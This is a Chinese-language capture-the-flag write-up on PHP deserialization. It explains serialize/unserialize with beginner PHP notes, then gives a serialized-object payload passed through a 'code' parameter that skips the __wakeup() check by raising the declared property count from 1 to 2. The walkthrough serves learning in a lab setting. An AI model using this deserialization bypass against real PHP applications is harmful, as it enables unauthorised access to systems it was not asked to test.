打开链接
审计一下代码
这里出现了一个__wakeup()函数,在进行PHP反序列化时,会先调用这个函数,但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup()的执行。
在php中与序列化相关的函数为:
serialize() 序列化 // 将一个类的实例(对象)序列化为字符串
unserialize() 反序列化 // 将已序列化的变量(字符串)变回原来 PHP的值
写php脚本前我们需要知道(大佬忽略,写给像我这样的小白帮助理解)
① php 源文件只能使用 <?php 和 <?= 这两种标签开头
<?php 标签通常用于纯 PHP 的脚本当中,而 <?= 通常用于模板当中
② 结尾并不是一定要加 ?>
加上之后,若?>后面还有内容,视为纯文本直接输出,直到再次碰到<?php或 <?=
若没加?>,之后的内容视为 PHP 代码,除非没有代码了
③ php中$符号的意思是变量
④ 全局变量是在所有函数外部定义的变量,拥有全局作用域,除了在函数内部不可用,全局变量可以被脚本中的任何部分访问,局部变量是在函数内部定义的变量,只能在定义它的函数内使用,局部变量会在函数调用结束时自动销毁,全局变量则在程序结束运行时才会被销毁。
⑤ php中new函数用于将对象实例化,使用方法:创建一个类、类属性、类方法,再构造一个自定义函数,通过new实例化对象,输出类的方法和功能。
class MY{ // 创建类 MY public $my; // 创建类属性,定义一个全局变量$my----类属性 var $xy; // 定义变量 $xy----类属性(var就是public的别名,用在类中定义公有属性)function CTF(){ // 构造自定义函数---类方法 } } $P=new MY(); // 实例化对象 echo $P; // 输出类的方法和功能 了解这些后我们来看这道题的脚本 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $Myon = new xctf(); $Myon = serialize($Myon); echo $Myon; ?>
前半部分是题目给出的,后面就是对xctf这个类的对象实例化,赋值给一个新的变量Myon,再对它序列化并输出。
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
对象类型:长度:"名字":类中变量的个数(xctf类存在1个属性):{类型:长度:"名字";类型:长度:"值";}
从结尾的代码来看,应该是想让我们给code传一个参数
构造payload :/?code=O:4:"xctf":1:{s:4:"flag";s:3:"111";}
可以看到__wakeup()函数起作用了,我们需要将xctf的参值改为2(任何大于1的数),由于与反序列化规则不符,就会反序列化失败,从而绕过__wakeup()函数。
修改payload:/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}